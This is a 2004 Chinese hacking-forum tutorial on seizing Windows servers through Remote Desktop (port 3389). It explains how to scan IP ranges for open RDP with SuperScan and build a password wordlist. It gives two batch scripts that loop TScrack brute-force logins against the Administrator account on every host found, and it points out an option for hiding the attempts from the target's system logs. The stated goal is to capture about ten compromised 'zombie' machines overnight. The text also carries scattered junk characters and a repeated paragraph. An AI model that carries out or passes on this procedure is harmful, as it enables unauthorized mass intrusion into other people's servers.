QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2696|回复: 0
打印 上一主题 下一主题

终端服务真正的另类入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 09:51 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:霜风 QQ:14226581

4 N/ q j: B3 x5 \

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。 . @; U5 f9 J+ S' |6 B这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: $ I5 q# a% w* L: J8 p: K 首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:7 `3 z- d/ ~; N% | 先打开superscan3如图1 * U1 l+ u, M+ F7 C; [7 \- s4 g v: L& O# ?: ^. l 此主题相关图片如下:, Z6 `" n3 H& A! j' y* _7 Z

3 y% P! F0 ]2 A5 _

6 X$ y. Y9 Y- [2 K% ~ 接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2 ) l2 [0 D0 y" c# y% p5 C3 |3 A0 w4 n" F5 @. A+ q: d 此主题相关图片如下:) S8 j0 U k8 T& M- k " u7 t" W: G7 i) Y

2 R5 M: Y1 p2 I0 p; V

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.) p; S7 n2 A0 a( G) u ~ 这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3 8 b- l( z+ W& F- l/ w- o% ` * _% e% Y7 n2 N此主题相关图片如下:3 t! P N) z% A9 g+ S) X3 Q

6 g" I" X+ D- D7 s7 H* X) ]

# r- e! v/ T/ o) w* I8 I“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。 / S2 e& F! V/ p" ~, J7 k. ?# O# W$ B* Q0 t% ] 此主题相关图片如下:2 a' C; I5 ?* ]! w5 Y+ x

% ]8 L- {/ K8 w" P: l( }

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5 6 C1 v5 l& a8 S+ Y/ X, |% Z( A7 ^0 q) i9 ^ 此主题相关图片如下: ' h4 c0 t5 U; P

# G# B. C3 ?9 w8 t" ?$ H

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。, m, [# m# t5 ?( e4 `/ C 所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。 3 h0 e1 R4 ?" A% F+ b% v7 wTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。* |+ J" Q( P& c6 A! N8 E6 @ 此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 e' u J a( A, ?2 }! ` 在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项: # t0 P6 s* T$ ]( V" q1 f-h : Print usage help and exit 8 n6 ?% p: }/ \' m-V : Print version info and exit ' w7 g O# m( _-s : Print chipher strenght info and exit8 ?+ g6 b" a) x% f8 X- a$ T9 t -b : Enable failed password beep( \! p) A2 `8 _1 i+ o7 y: [ -t : Use two simultaneous connections [EXPERIMENTAL]* C& D8 g0 Q4 p u -N : Prevent System Log entries on targeted server 4 U/ W( t; B% d7 Y4 D5 q' `# `-U : Uninstall tscrack and remove components& J" S* x1 F7 X) ~ e. l -f <number> : Wordlist entry to start cracking with : L: _& R3 }8 h" ]-F <delay> : Sampling Frequency (Delay between samples in ms)" F1 E4 S( F/ a* J3 W3 ] -l <user> : Account name to use, defaults to Administrator4 R0 ]8 i# A4 O0 M" I" h( H -w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted 4 t8 o6 m G( R2 b-p <password> : Use <password> to logon instead of wordlist/blank pass. |7 z. Q( y) B, L m -D <domain> : Specify domain to attempt logon to

& a; X6 ^5 ~5 z# _2 y. R L! x) W ! l: ?; v# h4 n2 L6 n, S, x$ F+ v 9 D4 Z# ?0 x7 K% p4 w- @我就帮忙翻译一下吧,翻译得不好可不要怪我啊: 2 F' n. R f$ O-h : 显示使用帮助然后退出; i$ }1 A* g$ g, `/ x -V : 显示版本信息然后退出: l4 U) u9 ?% M -s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)$ p: F4 N. b6 n9 d; a( E -b : 密码错误时发出声音 6 y' ?8 ?% d. G-t : 同时发出多个连接,就是多线程。 & I& M' ?* s! e1 W/ k9 D d-N : Prevent System Log entries on targeted server , c# W9 E5 c9 |- P+ K-U : 卸载移除tscrack组件。% j8 \( i) U/ c$ E5 J4 M -f <number> : 使用-F后面的密码。 ! m6 Q% L( s4 Y+ `7 j-F <delay> : 间隔时间(频率) 3 F$ ^9 g1 e( V) s. m S-l <user> : 使用-L后面的用户名 - e" k* ]8 s I: A-w <wordlist> : 使用-W后面的字典 * M. s! i7 M8 u' A1 U-p <password> : 使用-W后的密码 / y: w( l& n8 F; y z" m; s' [& {-D <domain> : 登陆主页面?

N5 L6 C) E$ Z2 G* V; Z5 j相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:6 u/ |' y9 |. i2 |' H- u2 |( L9 b7 V @if not exist IpcScan.txt goto noscan 5 x; U; Y" y5 y P4 w; ^% V@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i1 e9 P. @# e M3 t ^ :noscan9 K; k, `( n, K9 f+ A0 Q# ? @echo 3389.txt no find or scan faild

! S9 q R# }6 c: k 这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

, W3 Z2 t1 ^. {( _. l& J0 _: \2 B7 Y 保存后把后错名改为BAT就可以了。 % I4 Z- A4 D2 f! x' X; q还写一个BAT,名字为HACK.BAT,代码如下:

' ?% L' ]! @! V0 q+ G+ K& d8 H @if not exist tscrack.exe goto noscan6 m S& x' ?# W; _) z @tscrack %1 -l administartor -w pass.dic >>rouji.txt6 D. B7 n! v6 y: }$ L; J :noscan9 t5 x* J, I; r p- p @echo tscrack.exe no find or scan faild

) L$ K: \1 H$ f8 d/ G+ ^/ I+ I 这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC d4 x! a) u, q% n8 w制作方法如上。$ @4 ^' e W3 |2 B2 P 然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图68 |; S* l# u! |" l% h6 B4 O5 y ' R2 a* s8 `$ C5 L此主题相关图片如下:6 Y q, j) M! I( O' ?- Y+ ]% C

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. 7 a5 a8 V( h; ?! Y最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 1 t! ^! c7 z& }/ p _; p+ Y* x; O) Q2 S 6 U) I' c; x. @6 u1 q, L. r此主题相关图片如下: & G+ `9 ?* O/ k2 _- C# c$ A1 c( h i9 K, p! M, z 怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. * @3 v) _# E1 B7 K* C8 \' D# P6 D& O最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-8-30 23:06 , Processed in 0.758735 second(s), 51 queries .

回顶部